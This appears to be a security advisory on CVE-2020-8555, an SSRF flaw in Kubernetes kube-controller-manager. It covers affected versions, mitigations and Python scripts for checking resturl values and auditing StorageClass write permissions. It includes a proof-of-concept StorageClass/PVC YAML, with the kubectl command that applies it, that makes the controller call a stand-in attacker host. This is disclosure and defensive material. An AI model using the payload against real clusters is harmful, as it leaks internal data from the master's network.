Kubernetes Kube-Controller-Manager Server Side Request Forgery (SSRF) Vulnerability

Summary:

Kubernetes is an open source container orchestration system for automating application deployment, management and scaling. A security flaw in Kubernetes was disclosed on June 1, 2020: a Server Side Request Forgery (SSRF) vulnerability in kube-controller-manager. It allows an attacker to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master's host network, such as link-local or loopback services. The issue was assigned CVE-2020-8555.

Description:

An attacker with permission to create a pod that uses certain built-in volume types (GlusterFS, Quobyte, StorageOS (listed as "StorageFS" in the advisory), ScaleIO), or with permission to create a StorageClass, supplies a URL that one of these volume plugins will contact. When the volume is attached or the StorageClass is used for provisioning, kube-controller-manager makes GET or POST requests to that URL from the master's host network. The attacker does not control the request body, but part of the response is reported back, which is enough to leak information from endpoints on the master that are reachable without authentication.

Affected Products:

kube-controller-manager v1.18.0
kube-controller-manager v1.17.0 – v1.17.4
kube-controller-manager v1.16.0 – v1.16.8
kube-controller-manager < v1.15.11

Exploitation:

During volume provisioning the GlusterFS provisioner appends /volumes (the heketi REST API path) to the user-supplied URL in the resturl parameter. Ending resturl with # moves that appended path into the URL fragment, which the HTTP client never sends, so the request lands on exactly the path the attacker chose.
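The fragment trick above, as an added example that is not part of the original post or of the Kubernetes code: the first function models what a client that string-appends /volumes to resturl actually puts on the wire (Go's net/http, like browsers and Python's urllib, drops the fragment before building the request line), and the second is the kind of check a validating admission webhook could apply to StorageClass parameters before kube-controller-manager ever dials the URL. The ? variant (query instead of fragment) goes beyond the page; it truncates the appended path the same way. Function names and the sample URLs are the example's own.

```python
import ipaddress
from urllib.parse import urlsplit

# Suffix the glusterfs provisioner's heketi client concatenates onto resturl
# when it creates a volume (the "/volumes" the page refers to).
VOLUME_CREATE_SUFFIX = "/volumes"


def request_target(resturl: str, suffix: str = VOLUME_CREATE_SUFFIX) -> dict:
    """Model what reaches the server when `suffix` is string-appended to
    `resturl` and the result is sent by an HTTP client that drops the URL
    fragment before building the request line (Go's net/http does; so do
    browsers and Python's urllib/requests). Returns the host dialled and the
    path/query the server sees, plus the fragment that swallowed the suffix."""
    parts = urlsplit(resturl + suffix)
    return {
        "host": parts.netloc,
        "path": parts.path or "/",
        "query": parts.query,
        "fragment": parts.fragment,
    }


def resturl_findings(resturl: str) -> list:
    """Checks a defender could apply to StorageClass.parameters.resturl in a
    validating admission webhook, before kube-controller-manager ever dials
    it. Hostnames are not resolved here: a DNS name that points at an
    internal address needs a resolve-and-recheck step (mind DNS rebinding)."""
    findings = []
    parts = urlsplit(resturl)
    if parts.scheme not in ("http", "https"):
        findings.append(f"unexpected scheme {parts.scheme!r}")
    if "#" in resturl or "?" in resturl:
        findings.append("fragment/query in resturl: the appended API path is "
                        "discarded, so the caller controls the exact path")
    host = parts.hostname
    if host is None:
        findings.append("no host in resturl")
        return findings
    if host == "localhost" or host.endswith(".localhost"):
        findings.append(f"internal target: {host}")
        return findings
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return findings  # DNS name, not resolved in this offline check
    if ip.is_loopback or ip.is_link_local or ip.is_private or ip.is_unspecified:
        findings.append(f"internal target: {ip} (loopback/link-local/private)")
    return findings


if __name__ == "__main__":
    # Constructed inputs: the page's payload URL and a link-local address.
    print(request_target("http://attacker.com:6666/#"))
    print(resturl_findings("http://169.254.169.254/#"))
```

Blocking only the fragment character is not a fix on its own: the underlying problem is that the controller-manager dials an attacker-chosen host from the master's network at all, which is why the advisory's mitigations are about who may write StorageClasses and what the master exposes without authentication.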

YAML payload (sc-poc.yaml) used to trigger the half-blind SSRF; it is half-blind because the provisioning error reported back on the PVC carries part of the response rather than the whole of it:

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
  resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: poc-ssrf
spec:
  accessModes:
    - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 8Gi
  storageClassName: poc-ssrf

kube-controller-manager handled the provisioning of the claim and issued the resulting HTTP request to the attacker-controlled resturl:

kubectl create -f sc-poc.yaml


[Image: the request as received on the attacker's listener]

Image source: medium.com/@BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8

See the references below for more details about the vulnerability.

Mitigation:

Kubernetes has published an advisory and fixed releases (v1.18.1, v1.17.5, v1.16.9 and v1.15.11). To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster.

Per the advisory, prior to upgrading the vulnerability can also be mitigated by adding endpoint protections (authentication) to services on the master, restricting usage of the vulnerable volume types (for example through PodSecurityPolicy or an admission controller), and restricting StorageClass write permissions through RBAC.
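An added example, not from the advisory or from Qualys, of turning the affected-version list and the RBAC mitigation into an offline triage script: it decides whether a kube-controller-manager version string falls in the affected ranges above, flags StorageClasses that use one of the named in-tree provisioners, and lists which subjects can create, update or patch StorageClasses cluster-wide. The functions expect the JSON shape that kubectl get ... -o json returns; the documents embedded below are constructed for the example, and the function names are the example's own.

```python
import json
import re


def is_affected(version: str) -> bool:
    """Affected kube-controller-manager ranges as listed in the advisory."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised version string {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    if (major, minor, patch) < (1, 15, 11):
        return True                       # everything below v1.15.11
    if (major, minor) == (1, 16):
        return patch <= 8                 # v1.16.0 - v1.16.8
    if (major, minor) == (1, 17):
        return patch <= 4                 # v1.17.0 - v1.17.4
    return (major, minor, patch) == (1, 18, 0)


# Provisioners backed by the in-tree plugins the advisory names
# (StorageOS is written "StorageFS" in the advisory text).
VULNERABLE_PROVISIONERS = {
    "kubernetes.io/glusterfs", "kubernetes.io/quobyte",
    "kubernetes.io/storageos", "kubernetes.io/scaleio",
}


def audit_storageclasses(sc_list: dict) -> list:
    """Flag StorageClasses that use a vulnerable provisioner; for GlusterFS
    classes also surface the resturl kube-controller-manager will dial."""
    hits = []
    for item in sc_list.get("items", []):
        prov = item.get("provisioner", "")
        if prov in VULNERABLE_PROVISIONERS:
            params = item.get("parameters") or {}
            hits.append({"name": item["metadata"]["name"], "provisioner": prov,
                         "resturl": params.get("resturl")})
    return hits


# StorageClass is cluster-scoped, so only ClusterRoles bound through
# ClusterRoleBindings can grant writes to it.
WRITE_VERBS = {"create", "update", "patch", "*"}


def rule_grants_storageclass_write(rule: dict) -> bool:
    return bool({"storage.k8s.io", "*"} & set(rule.get("apiGroups", []))
                and {"storageclasses", "*"} & set(rule.get("resources", []))
                and WRITE_VERBS & set(rule.get("verbs", [])))


def storageclass_writers(clusterroles: dict, bindings: dict) -> list:
    """Subjects ('Kind:[namespace/]name') able to write StorageClasses."""
    writer_roles = {cr["metadata"]["name"] for cr in clusterroles.get("items", [])
                    if any(rule_grants_storageclass_write(r) for r in cr.get("rules", []))}
    subjects = set()
    for b in bindings.get("items", []):
        ref = b.get("roleRef", {})
        if ref.get("kind") == "ClusterRole" and ref.get("name") in writer_roles:
            for s in b.get("subjects", []):
                ns = s.get("namespace")
                subjects.add(f"{s['kind']}:{ns + '/' if ns else ''}{s['name']}")
    return sorted(subjects)


# Constructed sample documents in the shape of `kubectl get <kind> -o json`.
SAMPLE_STORAGECLASSES = json.loads('''{"items": [
 {"metadata": {"name": "poc-ssrf"}, "provisioner": "kubernetes.io/glusterfs",
  "parameters": {"resturl": "http://attacker.com:6666/#"}},
 {"metadata": {"name": "standard"}, "provisioner": "kubernetes.io/gce-pd",
  "parameters": {"type": "pd-standard"}}]}''')

SAMPLE_CLUSTERROLES = json.loads('''{"items": [
 {"metadata": {"name": "cluster-admin"},
  "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
 {"metadata": {"name": "storage-admin"},
  "rules": [{"apiGroups": ["storage.k8s.io"], "resources": ["storageclasses"],
             "verbs": ["create", "update", "delete"]}]},
 {"metadata": {"name": "view"},
  "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]}]}''')

SAMPLE_BINDINGS = json.loads('''{"items": [
 {"metadata": {"name": "cluster-admin"}, "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
  "subjects": [{"kind": "Group", "name": "system:masters"}]},
 {"metadata": {"name": "ci-storage"}, "roleRef": {"kind": "ClusterRole", "name": "storage-admin"},
  "subjects": [{"kind": "ServiceAccount", "name": "ci-deployer", "namespace": "dev"}]},
 {"metadata": {"name": "viewers"}, "roleRef": {"kind": "ClusterRole", "name": "view"},
  "subjects": [{"kind": "User", "name": "alice"}]}]}''')

if __name__ == "__main__":
    print("affected:", is_affected("v1.17.4"))
    print("storageclasses:", audit_storageclasses(SAMPLE_STORAGECLASSES))
    print("storageclass writers:", storageclass_writers(SAMPLE_CLUSTERROLES, SAMPLE_BINDINGS))
```

The RBAC pass does not expand aggregated ClusterRoles, so run it on the output of kubectl get clusterroles -o json, where aggregation has already been applied. Anyone in the writers list who is not a cluster administrator should lose the verb until the cluster is upgraded; restricting who can create pods with the vulnerable volume types is the other half of the same mitigation.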

Qualys customers can scan their network with QID 48047 to detect vulnerable assets. Please continue to follow Qualys Threat Protection for more coverage of these vulnerabilities.

References and Sources:

https://github.com/kubernetes/kubernetes/issues/91542

https://medium.com/@BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8
